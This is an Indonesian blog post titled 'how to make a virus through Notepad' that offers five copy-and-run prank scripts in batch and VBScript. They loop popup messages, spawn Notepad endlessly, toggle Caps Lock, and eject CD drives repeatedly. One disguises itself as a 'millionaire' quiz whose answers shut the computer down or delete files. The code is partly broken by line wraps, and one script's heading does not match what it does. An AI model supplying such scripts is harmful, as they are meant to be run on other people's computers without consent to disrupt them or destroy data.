Cara Membuat Virus Melalui Notepad


Hay Sobat,Gimana Kabar nya? Gimana UAS nya?pasti bisa donk,hahahah :D,langsung aja lah hehehehe
Dari sekian postingan tentang cara membuat virus di blog,mungkin cmn ini yang paling bikin kesel karena tidak hanya komputernya yang bingung tapi orangnya juga akan jengkel.
Penasaran nih ?
Dibawah ada beberapa script kode untuk membuat virus silahkan di ubah atau langsung dikopi ke notepad anda:
1. Virus dengan sasaran buat orang jengkel karena muncul terus, sebenarnya bukan virus tapi hanya program
yang sok-sok jadi virus :)

@ECHO off
:
Begin
msg * Haloo ?
msg * Lagi apa nih ?
msg * Weww ketahuan nih..
msg * Hayooo ngaku..
msg * Ye ye ketauan yeye ketahuan
msg * Aku matiin saja gimana
msg * Mau............................
GOTO BEGIN
simpan dengan berekstensi .bat contoh Usil.bat

 2.  Membuat Virus Wants to Be A Milionaire

@echo off

title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Matikan Komputer
echo 2. Format Komputer
echo 3. Yahhhh...
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali :D
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan .bat contoh contoh = Kuis Wants to be a millionaire.bat


3. Membuka notepad terus-menerus

@ECHO off

:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
Simpan dengan ektensi.bat

4. Shutdown sendiri dan kirim pesan otomatis

Set wshShell

=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Simpan dengan .vbs

5. CD Room terbuka dan tertutup terus

Set oWMP = CreateObject

("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan .vbs
Silakan di coba ya gan,semoga sukses
wkwkkwkw XD

Klo Masih bingung Bisa Hubungi FB saya:http://www.facebook.com/FaldoKiller?ref=tn_tnmn


3 comments

Poskan Komentar - Back to Content

 
Green Transparent Template, Gunakan Mozilla/Google chrome untuk tampilan maksimal :D Untuk Kembali Keatas Klik Gambar yg Diatas Ini :D